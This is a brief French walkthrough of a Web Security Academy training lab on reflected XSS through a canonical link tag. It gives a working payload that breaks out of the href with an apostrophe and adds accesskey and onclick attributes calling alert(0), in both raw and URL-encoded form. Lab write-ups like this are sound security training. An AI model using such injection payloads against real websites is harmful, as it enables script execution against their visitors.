XSS réfléchi dans la balise canonical

Reflected XSS in canonical link tag

Lab: Reflected XSS in canonical link tag | Web Security AcademyWebSecAcademy

Balise canonical qui reflète dans son href la valeur fournie dans l’URL (les chevrons < et > sont échappés). Objectif : injecter un attribut exécutable qui appelle alert() sur la page d’accueil.

On voit dans le code source qu’il y a une balise canonical qui prend le href depuis ce que l’on met dans l’URL.

On peut sortir avec une apostrophe : ' hacking => %27hacking.

' hacking
%27hacking

On peut utiliser accesskey pour que l’appui sur une touche déclenche l’action : 'accesskey='x' onclick='alert(0).

'accesskey='x'onclick='alert(0)
/?%27accesskey=%27x%27onclick=%27alert(0)

Action indiquée :

ALT + X

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?